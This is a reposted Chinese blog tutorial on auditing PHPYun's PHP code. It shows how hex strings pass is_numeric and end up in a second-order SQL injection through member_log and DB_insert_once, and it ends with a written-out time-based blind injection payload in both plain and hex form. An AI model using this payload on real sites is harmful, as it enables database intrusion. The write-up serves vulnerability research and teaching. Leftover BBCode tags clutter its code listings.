代码审计

记一次PHP代码审计寻找注入点

字号+ 作者:SSS论坛 来源:转载 2016-11-26 09:41 我要评论( )

0x00 知识前提 1. PHP提供了is_numeric函数,用来变量判断是否为数字。但是函数的范围比较广泛,不仅仅是十进制的数字 2.codeclass=xmlspanclass=phpspan[/align][......

0x00 知识前提

1. PHP提供了is_numeric函数,用来变量判断是否为数字。但是函数的范围比较广泛,不仅仅是十进制的数字

2.<?php3.echo is_numeric(233333);      [/align][align=left] # 14.echo is_numeric('233333');   [/align][align=left] # 15.echo is_numeric(0x233333); [/align][align=left]   # 16.echo is_numeric('0x233333');  [/align][align=left] # 17.echo is_numeric('233333abc');  [/align][align=left]# 08.?>

9.MySQL数据库同样支持16进制,也就是HEX编码。虽然不像is_numeric函数一样有着比较强的容错性,但还是能够完成如下操作。

[/align][align=left]10.> insert[/align]
[align=left] into test (id, value) values (1, 0x74657374);[/align][align=left]
11.> select * from test;
12.| id | value |
13.| 1  | test  |

以上两点单独看起来都没什么问题,但如果遇到合适的场景,比如程序猿只是用is_numeric函数验证变量是否为数字,就很有可能插入一些特殊字符到数据库中。虽然不能造成直接的SQL注入,但危险的数据已经悄悄潜伏在了路边,就等你经过。


0x10 寻找可利用的is_numeric

我们现在已经知道了is_numeric是个危险的函数,全局搜索的结果有很多,我们进一步筛选一下:

· 变量仅仅通过is_numeric判断是否为数字,没有经过Intval处理

· 变量插入/更新数据库的时候没有加引号(二次注入,需要先引入数据)

经过人肉筛选之后,我们得到了一个函数:

# /app/public/action.class.php[/color][/font][/align][align=left][font=Helvetica][color=#333333]
[/color][/font][/align][align=left][font=Helvetica][color=#333333]function FormatValues($Values){[/color][/font][/align][align=left][font=Helvetica][color=#333333]
[/color][/font][/align][align=left][font=Helvetica][color=#333333]    $ValuesStr='';[/color][/font][/align][align=left][font=Helvetica][color=#333333]
[/color][/font][/align][align=left][font=Helvetica][color=#333333]    foreach($Values as $k=>$v){[/color][/font][/align][align=left][font=Helvetica][color=#333333]
[/color][/font][/align][align=left][font=Helvetica][color=#333333]        if(is_numeric($k)){[/color][/font][/align][align=left][font=Helvetica][color=#333333]
[/color][/font][/align][align=left][font=Helvetica][color=#333333]            $ValuesStr.=','.$v;[/color][/font][/align][align=left][font=Helvetica][color=#333333]        }else{[/color][/font][/align][align=left][font=Helvetica][color=#333333]
[/color][/font][/align][align=left][font=Helvetica][color=#333333]            if(is_numeric($v)){[/color][/font][/align][align=left][font=Helvetica][color=#333333]
[/color][/font][/align][align=left][font=Helvetica][color=#333333]                $ValuesStr.=',`'.$k.'`='.$v;[/color][/font][/align][align=left][font=Helvetica][color=#333333]            }else{[/color][/font][/align][align=left][font=Helvetica][color=#333333]
[/color][/font][/align][align=left][font=Helvetica][color=#333333]                $ValuesStr.=',`'.$k.'`=\''.$v.'\'';[/color][/font][/align][align=left][font=Helvetica][color=#333333]            }[/color][/font][/align][align=left][font=Helvetica][color=#333333]        }[/color][/font][/align][align=left][font=Helvetica][color=#333333]    }[/color][/font][/align]
[align=left][font=Helvetica][color=#333333]    return substr($ValuesStr,1);
}

这是个中间函数,我们搜一下哪里用到了这个函数。

QQ图片20151117162225.png (406.69 KB, 下载次数: 0)

下载附件 保存到相册

2015-11-17 16:22 上传

多个数据表模型都用到了这个函数,基本都是Update操作。现在的思路是利用接口将恶意代码Update进数据库,再通过其他接口,从数据库读恶意数据,在再次存到数据库的时候,进行注入。接下来的任务,是筛选能造成二次注入的点。

0x20 二次注入点

寻找二次注入的过程,是重复性的工作。根据全局搜索得出的多个模型,找到对应的控制层的代码,根据如下条件去筛选:

· 恶意代码insert/update到数据库

· 从数据库select数据,再将数据拼接到新的语句中(没有再次转义)

举个例子,ask.model.php中,出现了五次FormatValues。

分别是:

· UpdateAttention

· UpdateQclass

· UpdateAnswer

· UpdateQuestion

· SaveQuestion

搜索UpdateAttention:

跟进函数:

]YWWQOH}JNHENX4)]0((4OR.png

可以看到$type, 也就是写进attention表的type,是可用的。但是在数据库中查过之后,发现type的数据结构是int(11),太短,放弃。

再继续查,UpdateQclass,没有实际用到。继续,UpdateAnswer:

验证后,也没有可用的。用这种方法,逐个去排除,直到:

跟进函数:

{

再看一下friend_info表(从SaveFriendInfo()可以得到表名),nickname、description的数据结构都是varchar(100)。

终于找到了恶意代码插入点,接下来看看能不能利用。从DB层(friend.model.php)可以找到GetFriendInfo():

function GetFriendInfo($Where=array(),$Options=array()){
 
    $WhereStr=$this->FormatWhere($Where);
 
    $FormatOptions=$this->FormatOptions($Options);
 
    $row=$this->DB_select_once('friend_info',$WhereStr,$FormatOptions['field']);[/align]
[align=left] if($row['pic']==''){[/align]
 
[align=left]        $row['pic']=$row['pic_big']=$this->config['sy_weburl'].'/'.$this->config['sy_friend_icon'];[/align][align=left]    }else{[/align]
[align=left]        $row['pic'] = str_replace("../",$this->config['sy_weburl']."/",$row['pic']);[/align][align=left]        $row['pic_big'] = str_replace("../",$this->config['sy_weburl']."/",$row['pic_big']);[/align][align=left]    }[/align][align=left]    return $row;[/align][align=left]}

从数据库读出来的数据,处理了一下pic参数,就返回了。搜索一下哪里用到了这个函数:

逐个排除,定位到函数:

跟进member_log函数:

function member_log($content,$opera='',$type=''){[/align][align=left]
    if($_COOKIE['uid']){[/align][align=left]
        $value="`uid`='".(int)$_COOKIE['uid']."',";
        $value.="`usertype`='".(int)$_COOKIE['usertype']."',";[/align][align=left]        $value.="`content`='".$content."',";[/align][align=left]        $value.="`opera`='".$opera."',";[/align][align=left]        $value.="`type`='".$type."',";[/align][align=left]        $value.="`ip`='".fun_ip_get()."',";[/align][align=left]        $value.="`ctime`='".time()."'";[/align][align=left]        $this->DB_insert_once("member_log",$value);[/align][align=left]    }[/align][align=left]}

跟进DB_insert_once函数:

function DB_insert_once($tablename, $value){[/align][align=left]
    $SQL = "INSERT INTO `" . $this->def . $tablename . "` SET ".$value;[/align][align=left]
    $this->db->query("set sql_mode=''");[/align][align=left]
    $this->db->query($SQL);[/align][align=left]
    $nid= $this->db->insert_id();[/align][align=left]
    return $nid;[/align][align=left]
}

成功找到注入点。

0x20 利用

1. 先尝试通过hex编码写入测试信息,如图所示 。刷新后,成功写入!
http://127.0.0.1/phpyun0625/friend/index.php?c=info

1. 测试二次注入的接口,在DB_insert_once()打印SQL语句

http://127.0.0.1/phpyun0625/ask/index.php?c=friend&a=atnuser
POST: id=2
返回结果如下:

3.INSERT INTO `phpyun_atn` SET `uid`='2',`sc_uid`='1',`usertype`='1',`sc_usertype`='1',`time`='1444726415'[/align]
[align=left]4.INSERT INTO `phpyun_friend_state` SET `uid`='2',`content`='关注了\'\"',`type`='2',`ctime`='1444726415'INSERT INTO `phpyun_sysmsg` SET `fa_uid`='1',`content`='用户 bb2 关注了你!',`username`='bb1',`ctime`='1444726415'[/align]
[align=left]6.INSERT INTO `phpyun_member_log` SET `uid`='2',`usertype`='1',`content`='关注了'"',`opera`='',`type`='',`ip`='127.0.0.1',`ctime`='1444726415'[/align][align=left]
1

第四条SQL语句成功注入。

1. 构造payload
构造一个基于时间的盲注:

8.',ip=(select if(mid(user(),1,1)='r',sleep(5),0))#0x20272c69703d2873656c656374206966286d6964287573657228292c312c31293d2772272c736c6565702835292c30292923

成功延时注入:

00x30 总结

代码审计,有很多重复性的工作。拼的就是耐心和经验。这篇文章,算是手把手教如何审计二次注入漏洞了。之后会更多的关注PHP函数使用不当导致的漏洞,敬请期待。



本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/hack/Code/295.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
  • DokuWiki fetch.php SSRF漏洞与tok安全验证绕过分析

    DokuWiki fetch.php SSRF漏洞与tok安全验证绕过分析

    2017-03-14 09:36

  • Semcms v2.1 php诸多漏洞

    Semcms v2.1 php诸多漏洞

    2017-03-14 09:30

  • 小白的代码审计之路(一)

    小白的代码审计之路(一)

    2017-03-09 14:06

  • 浅谈Discuz插件代码安全

    浅谈Discuz插件代码安全

    2017-02-22 16:07

网友点评
暂时未开启评论功能~